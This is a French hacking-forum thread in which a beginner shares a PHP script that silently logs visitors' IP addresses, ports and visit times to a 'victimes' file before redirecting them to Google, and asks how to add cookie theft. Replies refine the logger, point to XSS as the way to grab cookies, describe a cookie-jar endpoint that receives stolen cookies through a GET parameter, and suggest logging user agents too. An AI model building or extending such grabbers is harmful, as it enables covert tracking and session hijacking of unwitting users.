[Php] Script de récupération de données d'utilisateurs

[Apache9]

Bonjour,

J'ai actuellement un script php qui récupère ip + port.

Code PHP :

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$port = $_SERVER['REMOTE_PORT']; 
$jma = date("d/m/Y"); 
$h = date("H");
$min = date("i");
$sec = date("s"); 
$fp = fopen("victimes-98978-78787-8787-54778-877545.txt", "a"); 
fputs($fp, "L'adresse ip et le port était : $ip:$port;
s'est connecté le $jma à $h:$min:$sec.
//
"); 
fclose($fp);  
header('Location: http://www.google.fr/');
exit();
?>

Je voudrais donc l'amélioré, en récupérant les cookies, et si vous avez encore d'autre idée, n’hésitai pas.

[InstinctHack]

Ton code fait mal aux yeux l'ami :p

Code PHP :

<?php
$fp = fopen("victimes-98978-78787-8787-54778-877545.txt", "a"); 
fputs($fp, 'L\'adresse ip et le port était : '.$_SERVER['REMOTE_ADDR'].':'.$_SERVER['REMOTE_PORT'].
's\'est connecté le '.date("d/m/Y").' à '.date("H:i:s"));
fclose($fp); 


N'est-ce pas déjà mieux ?

[Apache9]

Pourquoi mal au yeux ?

[InstinctHack]

tu stocke les données dans des variables que tu n'utilise qu'une fois (encore ça ça passe)
mais tu utilise 3 fois la meme fonction =O alors qu'une seul suffit,
et l'utilisation des doubles quotes...

[supersnail]

Sinon pour récupérer les cookies, il faut exploiter une faille du type XSS sur le site visé (cf le tuto de CyberSee ).

Heureusement que tu peux pas récupérer les cookies de tous les sites avec une simple visite sur une page, le contraire serait inquiétant :>

[Apache9]

@sonn oui c'est plus clair, mais pas retour a la ligne entre chaque ip

@aaSSfxxx, Ah merci, car moi on m'avais parler de faire un "Backdoor Cookies" mais moi qui débute dans tout ça, je n'ai pas trop compris.

[InstinctHack]

<br /> pour les ip.
sinon aaSSfxxx as raison CS as mis un tuto là-dessus

[Zhyar]

@sonn <br /> c'est en HTML.
Là il enregistre ça dans un fichier txt donc il faut faire \r\n ou \n.

[InstinctHack]

Ah oui, merci Zhyar, faute d'inattention, désolé :p

[Booster2ooo]

@Zhyar & sonn > PHP_EOL

@Apache9 > pour ta "backdoor cookie", il faut faire passer le cookie via une variable GET (donc dans l'url, par exemple cookiejar.php?cookie=<leCookieDuGars>
et récup via $_GET['cookie']

Enjoy

[Zhyar]

@Booster2ooo > Je connaissais même pas cette constante ! Merci

[Apache9]

@Zhyar oui car j'avais essayer \n et aucun résultats par contre j'ai pas test \r\n je vais test, merci.

@Booster2ooo ah d'accord merci je vais test aussi.

[AntoLeNice]

Mais pourquoi tu voudrais récupérer les cookies d'un utilisateur ? Selon moi, y'a absolument rien de white hat qu'on peut faire avec les cookies d'un utilisateur.

[InstinctHack]

Tester le système, encore et toujours AntoLeNice

[LeuhVa]

D'ailleurs on peut 'optimiser' ce scrit avec d'autres variables d'environnement type : $_SERVER['HTTP_ACCEPT_LANGUAGE']
$_SERVER['HTTP_USER_AGENT'] ou même $_SERVER['REDIRECT_URL'] !